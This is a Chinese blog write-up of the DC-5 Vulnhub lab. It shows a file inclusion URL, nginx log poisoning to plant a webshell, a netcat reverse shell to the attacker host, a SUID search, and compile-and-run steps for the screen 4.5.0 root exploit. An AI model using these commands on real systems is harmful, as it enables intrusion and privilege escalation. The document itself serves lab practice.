dc-5靶机渗透记录

最新推荐文章于 2023-02-14 00:22:40 发布
最新推荐文章于 2023-02-14 00:22:40 发布
阅读量5.5k 收藏
点赞数 1
分类专栏: 渗透记录 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlllllianqing/article/details/121299352
版权

dc-5靶机渗透记录

实验环境

  • 靶机:DC-5靶机(192.168.126.137)
  • 攻击机:kali Linux(192.168.126.129)

信息收集

ip:192.168.126.137

开放的端口:

80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
运行: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
操作系统详细信息: Linux 3.2 - 4.9

渗透测试

1.漏洞发现与getshell

发现打开了80端口,这里我们登上直接web端

在contact页面发现有留言板块,这里的话考虑xss

image-20211112231031039

然后…就没有然后了,显然是不存在的

通过查一下大佬们的博客,发现在提交后的thankyou.php页面存在文件包含漏洞,自己上手试一下
在这里插入图片描述
验证成功,发现存在文件包含漏洞

image-20211112231720638

到这里的话,就不知道该如何继续了,百度之后,发现了大神们的骚操作

利用nginx日志实现写入webshell

http://192.168.126.137/thankyou.php?file=/var/log/nginx/access.log

http://192.168.126.137/thankyou.php?file=/var/log/nginx/error.log

这里写入shell,打开error.log发现并没有报错日志,判定可以进行日志写入shell

image-20211112233546063

image-20211112233512927这里看到蚁🗡连接成功,拿到webshell
在这里插入图片描述image-20211112233818807

2.提权

nc -e /bin/bash 192.168.126.129 4567
在这里插入图片描述image-20211113002618703
可以看到,反弹shell成功,获取交互

python -c 'import pty;pty.spawn("/bin/bash")'

image-20211113002917743

经过一番文件查找,也没有找到有用的信息

思考其他的提权方法

想到可以通过suid进行提权

image-20211113003325625

查找具有suid权限的命令

find / -perm /4000 2>dev/null

image-20211113003626868

发现screen-4.5.0,这里可以直接使用kali查找发现screen-4.5.0的漏洞脚本文件

searchsploit screen 4.5.0

image-20211113004204212

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt

image-20211113004945341

gcc -fPIC -shared -ldl -o libhax.so libhax.c

image-20211113005304119

将41154.sh中下面一部分c语言代码另存为rootshell.c

gcc -o rootshell rootshell.c

image-20211113005345609

将41154.sh中剩下部分代码另存为dc5.sh脚本文件

并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错

image-20211113011103216

将三个文件通过蚁🗡上传到/tmp目录下

image-20211113011859271

www-data@dc-5:/tmp$ chmod +x dc5.sh

www-data@dc-5:/tmp$ ./dc5.sh

image-20211113011751141

image-20211113012031356

获取root权限后,进入root目录下,成功获取thisistheflag.txt文件

image-20211113012246883

总结

渗透步骤

1.在web端使用xss,发现留言板,使用xss失败后,进行文件包含漏洞利用;

2.通过利用nginx日志实现写入webshell,使用蚁🗡连接;

3.执行反弹shell,getshell成功;

4.通过suid进行提权;

自我总结

1.爆破后台路径的字典不够,导致基本上是通过看大佬的博客来直接操作的;

2.对于漏洞脚本文件不够了解,导致即使kali里面可以直接搜索到漏洞的脚本文件,也不会使用;

甜不拉几
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
B2R Raven: 2靶机渗透
最新发布
weixin_42786460的博客
10-14 925
B2R Raven: 2靶机渗透
CTF SSH服务root渗透
Kstheme的博客
08-15 2302
工具: kali linux ssh root渗透靶机 操作步骤: ssh协议介绍 SSH为Secure Shell的缩写,由IETF网络小组(Network Working Group)所指定;SSH为建立在应用层基础上的安全协议 SSH是目前较可靠,专为远程登录会话和其他网络提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又...
靶机渗透练习09-driftingblues9
Force~
04-01 3330
靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) n.
黑客零基础第三章-Web漏洞实战-文件上传DC5
ShadowBlade
08-24 1832
第五节内容讲述了文件包含漏洞LIF的利用原理,并在DVWA上进行了日志投毒结合LFI入侵的实验。本节以实战的方式,结合vulnhub靶机DC5让大家进一步熟练LFI结合日志投毒的实际应用。 如果靶机部署有疑问,请留言!
网络安全之NMAP工具
月生的静心苑
03-28 1651
一、NMAP简介   nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。从扫描类型一节可以得到细节。nmap还提供了一些高级的特征,例如:通过TCP/IP协议栈特征探测操作系统类型,秘密扫描,动态延时和重传计
4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露
c10udz的博客
10-29 4524
NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。NFS服务端机器:通过NFS协议将文件共享到网络上NFS客户端机器:通过网络挂载NFS共享目录到本地补充:NFS服务器主要进程1 rpc.nfsd 进程NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。
web渗透--rpcbind利用
朝阳似锦 晖映山河
09-09 7605
rpcbind介绍 rpcbind是NFS(网络文件共享协议)中进行消息通知的服务,一般是111端口,并且NFS配置开启rpcbind_enable=“YES” 探测目标rpcbind nmap -sV IP地址 -p 端口 eg:nmap -sV 192.168.207.133 -p 111 searchsplioit rpcbind //查看是否有可利用的脚本 nmap脚本探测 nmap使用nmap -p 端口号 --script=rpcinfo 目标IP地址 来探测目标IP地址的rpci
Linux网络抓包工具tcpdump
匠人精神,持之以恒!
07-26 3948
一、tcpdump介绍 tcpdump 是一个运行在命令行下的抓包工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统操作系统(如linux,BSD等)。 二、安装&用法说明 2.1、安装 $ yum -y install tcpdump 2.2、用法说明 tcpdump采用命令行方式,它的命令格式为 tcpdump [ -DenNqvX ] [ -c count ] [ -F file ] [ -i interfac
nginx访问日志(access_log)
热门推荐
JohnieLi的博客
01-28 1万+
一、nginx访问日志介绍 nginx软件会把每个用户访问网站的日志信息记录到指定的日志文件里,供网站提供者分析用户的浏览行为等,此功能由ngx_http_log_module模块负责,对应的官方地址为:http://nginx.org/en/docs/http/ngx_http_log_module.html. 二、访问日志参数 nginx的访问日志主要有以下2个参数控制 log_format 用来定义记录日志的格式(可以定义多种日志格式,取不同的名字即可) access_log
RPC漏洞攻击
04-12
一点点小技术 值得下载的呵呵 众所周知RPCRPC攻击是黑客攻之手段的
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
ssh服务渗透(拿到第一个用户权限)
weixin_43803070的博客
07-19 1534
** ssh基础知识: ** ** 一、信息收集 ** 探测开放端口服务 root@kali:~# nmap -sV 192.168.1.107 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:04 CST Nmap scan report for 192.168.1.107 Host is up (0.00013s l...
kali linux网络扫描~目标识别及常见服务扫描策略
十一、的博客
05-11 3581
理论知识 标志信息是指一些主机或服务响应的欢迎信息或版本信息 SNMP(简单网络管理协议)是由一组网络管理的标准组成,包含一个应用层协议和一组资源对象 SNMP能够支持网络管理系统,用以检测连接到网络上的设备是否有任何引起管理上关注的情况 SNMP是一种简单管理协议,它使用UDP协议通过以太网来执行网络管理 SNMP协议主要由两大部分组成,分别是SNMP管理站和SNMP代理,其中,SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这些信息进行处理,最后反馈给网络管理员,而SNM
kali渗透DC-5
余笙.'的博客
12-05 990
kali渗透DC- 5靶机
nginx负载均衡下的webshell上传
m0_63069714的博客
02-14 520
因为我们是反向代理的负载均衡,就存在上传文件出现一台后端服务器上有我们上传的文件,另一台服务器上没有我们上传的文件,出现的结果就是,一旦一台服务器上没有,那么在请求轮到这台服务器的时候,就会报出404的错误,从而影响使用,这也就是一会出现正常,一会出现错误的原因。当我们上传一个较大的文件时,由于AntSword上传文件时,采用的是分片上传方式,把一个文件分成了多次HTTP请求发送给目标,造成文件的一部分内容在A这台服务器上,另一部分文件在B这台服务器上,从而使得较大的工具或者文件无法打开或者使用。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值